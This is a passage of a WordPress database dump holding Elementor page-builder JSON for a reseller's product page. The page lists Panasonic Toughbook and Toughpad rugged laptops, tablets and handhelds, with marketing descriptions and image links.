OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><\\/div><p><br \\/>Read more at https:\\/\\/na.panasonic.com\\/us\\/computers-tablets-handhelds\\/tablets\\/tablets\\/toughbook-l1#dTovJ2FZwMSF072x.99<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"Add Your Heading Text Here\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(3363,2607,'_elementor_version','0.4'),(3387,2614,'_elementor_data','[{\"id\":\"292e187\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"19fa744\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"b9d3051\",\"elType\":\"widget\",\"settings\":{\"title\":\"Computer Toughbook\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"180ee07\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0cbe142\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"52bc26e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 33\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"09417bc\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"be86921\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 31\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"2a41045\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9db1fee\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 54\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"18d10b9\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"330ac40\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"e3edb98\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_33_hero.png\",\"id\":2594}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6e91208\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5da701a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb31_win10.jpg\",\"id\":2593}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"bb47d1c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"15ce475\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_54_hero.png\",\"id\":2595}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7747f88\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"4a2a07d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"2aad3d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 33 is the first fully-rugged 2-in-1 of its kind\\u2014redefining rugged flexibility for those who work in demanding conditions. TOUGHBOOK 33 features a groundbreaking 3:2 display, making it easier to handle, while improving readability of the business applications and documents workers use every day. This innovative design also enables backward compatibility with an entire generation of TOUGHBOOK 31 vehicle docks. It\'s as versatile as your job demands it to be. From a brighter 12\\\" detachable screen with infrared camera for Windows Hello support, to hot-swappable twin batteries and a choice of keyboards\\u2014TOUGHBOOK 33 is built for maximum mobility.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"5961b01\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"4dfcd25\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<header class=\\\"product-details__header\\\"><\\/header><div class=\\\"buttons-bar product-details__dealers\\\"><span style=\\\"color: #333333; font-family: Raleway, Helvetica, Arial, sans-serif; font-size: 15px; font-weight: bold; letter-spacing: 2px; text-transform: uppercase;\\\">PRODUCT DETAILS<\\/span><\\/div><div class=\\\"product-details__description\\\"><div class=\\\"field field--name-field-product-details field--type-text-long field--label-above\\\"><div class=\\\"field__item\\\"><p>Panasonic presents the TOUGHBOOK\\u00ae 31, the reliable laptop offering\\u00a0the world\\u2019s most rugged design. With drop-shock protection and a\\u00a0MIL-STD-810G certification, it\\u2019s the undisputed leader in the fully\\u00a0rugged category. Its Intel\\u00ae Core\\u2122 i5 processor packs a punch and it delivers amazing battery life\\u201419.5 hours, or 29 hours with the optional media bay\\u00a02nd battery. Combine six generations of delivering rugged performance\\u00a0plus an amazing 18 years of consistent docking compatibility, TOUGHBOOK 31 is a laptop that will go the distance with you anytime, anywhere.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div><\\/div><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6cc38cf\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a00781\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>A semi-rugged 14\\u201d laptop, the TOUGHBOOK 54 is the world\'s thinnest and lightest semi-rugged in its class, but now packs even more of a punch. The TOUGHBOOK 54 is now available with 7th Gen Intel\\u00ae processors running Windows\\u00ae 10 Pro and feature a spill-resistant, full magnesium alloy design, storage drive heater and backlit keyboard. The TOUGHBOOK 54 has a wide range of integrated options such as dedicated GPS, 4G LTE mobile broadband with satellite GPS, and dual antenna pass-through. It offers an optional second battery, allowing hot swap battery replacement without the need to shut down or hibernate. The TOUGHBOOK 54 one of the most versatile and advanced semi-rugged notebooks on the market.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"3bc7e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"f01603d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"c925bd0\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK 20\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"75026de\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"830958b\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-Q2\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c5649b0\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"1a9a32a\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4b619a0\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/20mk2_laptop_right_angle_detached-1.jpg\",\"id\":2596}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"5c9e08f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"4d72a50\",\"elType\":\"widget\",\"settings\":{\"image_size\":\"medium\",\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/toughpad-q2-hero.png\",\"id\":2597}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e27844b\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"7c2e0fc\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"9e46753\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae 20 is a fully rugged, lightweight laptop that easily detaches to become a 10.1\\\" tablet. And it only takes one hand. The detachable laptop has a magnesium alloy chassis and is also MIL-STD-810G and IP65 certified, so it can take the abuse of most any job site. At only 3.9 pounds, this 2-in-1 machine is good on the go. The clever built-in handle also functions as a kickstand, providing on-the-job flexibility. And even as the workday gets longer, power won\'t be a problem. The optional bridge battery allows hot swap battery replacement without disruption. The gloved multi touch display is sunlight-viewable, making this hybrid laptop perfect for rugged outdoor environments. With this detachable laptop tablet at your side, you can handle anything the workday throws at you.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c395c6f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f07ddc4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>From the industry leader in reliability comes the Panasonic TOUGHPAD\\u00ae FZ-Q2 12.5-inch 2-in-1 Windows\\u00ae 10 PC. Built with the rugged durability consumers have come to expect from TOUGHBOOK, this PC is designed for users who need more from their computer than what a typical consumer device can provide. Enhanced with features like a superior battery life and additional ports, the TOUGHPAD FZ-Q2 semi-rugged convertible tablet also possesses a full HD display with an anti-reflective touchscreen along with a spill-resistant keyboard to maximize usability in the field or in the office.<\\/p><p><span style=\\\"font-size: 0.875rem;\\\">[maxbutton id=\\\"1\\\" ]<\\/span><\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"816152c\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"488a087\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fb85606\",\"elType\":\"widget\",\"settings\":{\"title\":\"Handhelds\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"fda2a67\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"b29f967\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b342b76\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK T1\",\"header_size\":\"h4\",\"align\":\"justify\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"b63ad5d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ed06566\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK N1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"711ad8e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"3256f2d\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-X1\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"68ee5f8\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"32bd399\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"284c9f7\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-t1_image1-1_ss_1.jpg\",\"id\":2601}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"c1dba18\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"57df093\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-n1_mk2_android_image_2_1.jpg\",\"id\":2604}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"6aba493\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b370c19\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/236380_F1X1_Hero.png\",\"id\":2603}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e414452\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"0318f25\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"8fca4ad\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae\\u00a0T1 is a slim and sleek Android OS based handheld that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used in the enterprise to collect information from workers in retail stores, warehouses field service, transportation and delivery or many other environments where work must occur belies its mild looking exterior. The FZ-T1 has a quad-core processor and a straight-shooting barcode reader, options to have a pistol grip with trigger, use a stylus pen or connect to multi-carrier 4G LTE with voice capability, yet end users will feel comfortable with its Android OS. This handheld\'s users won\\u2019t miss a beat with its great battery life, glove and rain touch enabled 5\\\" screen, 5 foot drop rating and IP66 and IP68 certification.\\u00a0 The TOUGHBOOK\\u00a0T1 is ready to be used by satisfied end users everywhere in your organization.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"07cdd64\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"380b880\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK\\u00ae N1 \\u2014 a powerful, slim and fully rugged handheld. It\\u2019s the all-in-one tool you\\u2019ve been waiting for, and it\\u2019s ideal for where work takes you each day. With an octa-core processor, angled rear-facing barcode reader, optional stylus pen, and long-lasting battery that is warm-swappable; you won\\u2019t miss a beat. And when a flexible device is in demand, the TOUGHBOOK N1 delivers the Android\\u2122 operating system,\\u00a0giving you the ability to develop in an open environment with thousands of enterprise grade applications at your fingertips from the Google Play store or Panasonic\'s partners: independent software vendors (ISVs) and resellers\\/integrators. Plus, with built-in multi-carrier 4G LTE, voice capabilities, and dual SIM cards, the TOUGHBOOK N1 is ready to go where business takes you. And if it takes a seven-foot drop, don\\u2019t worry \\u2014 it can handle it, making it the choice for unrelenting conditions. So take it to work. It can take it.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"730c08e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"1efa495\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The TOUGHPAD\\u00ae FZ-X1 is the world\'s most rugged 5-inch tablet and a whole lot more. For the first time, you can pair military-grade toughness and enterprise-class mobile computing power with Android-powered 4G data and voice services. Now field staff in the most demanding environments can have all the computing power they need in a handheld tablet small enough to drop in a pocket. Built on the flexible, secure Android 5.1.1 OS, the FZ-X1 lets businesses leverage their existing investments in enterprise applications without sacrificing performance and ruggedness. And it is seriously rugged.\\u00a0Thirty minutes of under five feet of water rugged.\\u00a0Ten foot drops onto solid concrete rugged. Built-in heater for -4\\u00b0 F weather rugged. Whether you throw it in a toolbox or literally take it into battle, the FZ-X1 can handle whatever comes its way.<\\/p><p>[maxbutton id=\\\"1\\\" ]<\\/p><\\/div>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"645131d\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"5ec8bc5\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cea0ebe\",\"elType\":\"widget\",\"settings\":{\"title\":\"Tablets\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9a3b9cc\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"ebdc4a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9e27fe8\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHBOOK L1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"cf2e3fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ba5591e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-M1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"375c2e2\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ac4648e\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-G1\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c92f938\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"bb0c96c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f6ee69c\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-l1_right_ss.jpg\",\"id\":2609}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d16c223\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca8b0be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-m1_image_01_new_win10.jpg\",\"id\":2610}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ddfa1b6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ca5913e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/fz-g1mk5_us_image02_ss.jpg\",\"id\":2611}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"a2a079e\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"a6cb494\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"636c2cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic TOUGHBOOK L1 is a slim and sleek Android\\u2122 OS based\\u00a07\\\" tablet that proudly carries the TOUGHBOOK\\u00a0name. Its ability to be used\\u00a0in the enterprise to collect information from workers in retail stores,\\u00a0warehouses field service, transportation and delivery or many other\\u00a0environments where work must occur belies its mild looking exterior.\\u00a0The TOUGHBOOK L1 has a quad-core processor and optional straight-shooting\\u00a0barcode reader from portrait to landscape, use a stylus pen or connect\\u00a0to multi-carrier 4G LTE and provide the ease of use of the Andorid OS.\\u00a0This tablet\\u2019s users won\\u2019t miss a beat with its great battery life, glove and\\u00a0rain touch enabled 7\\\" screen, 5 foot drop rating and IP65 and IP67\\u00a0certification. The TOUGHBOOK L1 is ready to be used by satisfied end\\u00a0users everywhere in your organization.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"a926860\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"30fc1f3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The Panasonic FZ-M1 is the fully rugged Windows\\u00ae tablet, built to\\u00a0enable mission-critical mobile worker productivity without compromise. Powered\\u00a0by Windows\\u00ae 10 Pro, the FZ-M1 features a long life, user-replaceable\\u00a0battery and a daylight-readable, high-sensitivity multi-touch display for use\\u00a0with heavy gloves. With the broadest range of configuration options available in\\u00a0its class, the highly customizable FZ-M1 is the ideal tool for today\\u2019s\\u00a0mobile workforce. In addition to the highly configurable options, added models\\u00a0of Thermal Camera, Real Sense Camera, RTK\\/GPS, as well as several more.\\u00a0Allows the FZ-M1 to be the most comprehensive 7\\\" tablet in the market.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"faa365e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a32d55e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The FZ-G1 Windows 10 Pro tablet offers a fluid user experience\\u00a0while providing crucial port connectivity and feature-rich options in a compact\\u00a0size. Designed for highly mobile field workers, it\\u2019s the thinnest and lightest\\u00a0fully rugged 10.1\\\" tablet running Windows 10 Pro 64-Bit. Powered by an\\u00a0Intel\\u00ae Core\\u2122 i5 vPro\\u2122 processor with a MIL-STD-810G and IP65 certified, the FZ-G1 Windows 10 tablet leads the way in rugged mobile\\u00a0computing. Add to that an HD daylight-readable 10-point gloved multi touch +\\u00a0waterproof digitizer pen, and it becomes an essential tool for field workers.\\u00a0With added Thermal camera and IR camera options.\\u00a0 Can also support \\\"Windows Hello\\\" for enhanced security.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ae37dad\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"aca729e\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"b56dd64\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-A2\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false},{\"id\":\"697550c\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"46a580a\",\"elType\":\"widget\",\"settings\":{\"title\":\"TOUGHPAD FZ-B2\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d7ecd2\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ae2a70d\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"fb7e441\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/tb_fz_a2_hero_front-1.png\",\"id\":2612}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"34adf46\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3fc0690\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/prod-jtb2-hero.png\",\"id\":2613}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d0e7f24\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"ff2d0d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"705b4b6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>With the Android 6.0 (Marshmallow) operating system and Intel\\u00ae x5-Z8550 processor, the Panasonic TOUGHPAD\\u00ae A2 10.1-inch fully rugged Android\\u2122 tablet provides enterprise features and reliability miles ahead of consumer tablets. With the ability to be WWAN 4G LTE connected and a super-bright 800 NIT screen, it is the perfect solution for workers in the field. However demanding the job, the dependable TOUGHPAD\\u00a0FZ-A2 tablet is up to the task.<\\/p><\\/div><p>\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0e2f59f\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"0fedb48\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h5 class=\\\"field__label\\\">PRODUCT DETAILS<\\/h5><div class=\\\"field__item\\\"><p>The rugged, 7-inch Panasonic TOUGHPAD\\u00ae FZ-B2, now powered by Android\\u2122 6.0.1 (Marshmallow) and the latest Intel\\u00ae AtomTM x5-Z8550 processor is an easy-to-use, enterprise-grade productivity booster that works rain or shine. With durability, power and a range of configuration options \\u2013 at a price within reach of any business \\u2013 the TOUGHPAD\\u00a0FZ-B2 features a faster CPU, 